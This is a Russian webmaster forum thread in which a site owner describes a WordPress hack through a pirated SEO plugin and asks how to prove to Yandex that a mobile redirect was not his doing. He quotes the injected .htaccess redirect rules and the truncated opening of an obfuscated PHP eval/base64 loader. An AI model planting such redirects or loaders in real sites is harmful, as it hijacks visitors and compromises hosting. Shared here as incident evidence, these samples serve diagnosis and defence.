- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На хостинге хранится десяток сайтов, один из них использует cms Wordpress. Как оказалось Wordpress это просто рай для взломщиков. Кто-то нашел дырку в безопасности и залил шелл, который внес изменения во все редиректы на всех сайтах хостинга. В ближайший апдейт яндекс выкинул все сайты из топов - ровно на -20 позиций.
Почуяв неладное я пишу в яндекс. Получаю ответ:
Если Вы будете развивать Ваш сайт для пользователей, размещать уникальную, полезную информацию и следовать нашим рекомендациям, то со временем ограничения могут быть сняты автоматически, и позиции сайта в результатах поиска улучшатся.
Шелл был удален через 2 дня, потом писал в яндекс.
Как доказать что мобильный редирект был использован без моего ведома?
Так и пиши в тех поддержку взломали сайт. В общем правду пиши!
Как оказалось Wordpress это просто рай для взломщиков.
Зачем вы троллите?
Расскажите уж нам - через какую дырку Вордпресса ломанули движок?
Как доказать что мобильный редирект был использован без моего ведома?
Метрику закрыли в хосте? Если нет, то Яндекс видит как вы ходите со своего браузера по сайту, который делает выплаты за мобильный редирект :o
Зачем вы троллите?
Расскажите уж нам - через какую дырку Вордпресса ломанули движок?
Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).
Через seo плагин был залит шеел. Хостинг сразу же ругался и выдал вирус {CAV}Php.Trojan.StopPost, я его удалить смог только через 2 дня, т.к. область заражения была огромная (десяток сайтов).
htaccess прописывалось следующее:
RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]
RewriteRule .* http://warp-master.ru/opera/load/ [L,R]
и далее....
В файлы движков добавлялся php код, и обнаружил неизвестный файл в корне сайта:
<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr.
Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).
Через seo плагин был залит шеел.
Поверим. Только причем тут вп, если шелл был залит через плагин?
ТС, имя плагина в студию.
Поверим. Только причем тут вп, если шелл был залит через плагин?
Притом что он давал модифицировать системные файлы. ДА и вообще теперь он мне не нравится 😡
Уж больно легко заражаются wordpress сайты с этими плагинами. Тем, кто, как я не профессионально занимается вебмастерингом, легко попастся на удочку мошенников, распространяющих вирусы под видом плагинов для wordpress.
Плагин
All in One SEO Pack, каюсь, скачал из инета....
Плагин
All in One SEO Pack, каюсь, скачал из инета....
Во-первых, надо обновляться, во-вторых, где гарантии, что вредоносный код уже не был внедрен в плагин, скачанный на просторах?
Плагин All in One SEO Pack, каюсь, скачал из инета....
Золотые слова: скачан из интернета!
Точнее пишите, откуда? С официальной страницы?
Напиши им все то, что написал сюда.